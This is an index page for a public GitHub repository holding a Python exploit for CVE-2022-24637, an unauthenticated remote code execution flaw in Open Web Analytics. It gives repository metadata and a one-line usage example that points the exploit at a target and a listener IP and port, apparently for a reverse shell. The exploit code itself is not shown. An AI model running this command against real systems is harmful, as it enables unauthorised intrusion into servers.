Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/hupe1980/cve-2022-24637
Open Web Analytics (OWA) - Unauthenticated Remote Code Execution
https://github.com/hupe1980/cve-2022-24637
cve-2022-24637 openwebanalytics owa
Last synced: 29 days ago
JSON representation
Open Web Analytics (OWA) - Unauthenticated Remote Code Execution
- Host: GitHub
- URL: https://github.com/hupe1980/cve-2022-24637
- Owner: hupe1980
- License: mit
- Created: 2022-10-08T21:12:35.000Z (about 2 years ago)
- Default Branch: main
- Last Pushed: 2022-10-12T17:14:54.000Z (about 2 years ago)
- Last Synced: 2024-10-05T17:48:09.047Z (about 1 month ago)
- Topics: cve-2022-24637, openwebanalytics, owa
- Language: Python
- Homepage:
- Size: 4.88 KB
- Stars: 5
- Watchers: 2
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# CVE-2022-24637
> Open Web Analytics (OWA) - Unauthenticated Remote Code Execution- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24637
## Example
```bash
python3 exploit.py -u admin -p hacker http://target.org 10.10.11.12 4444
```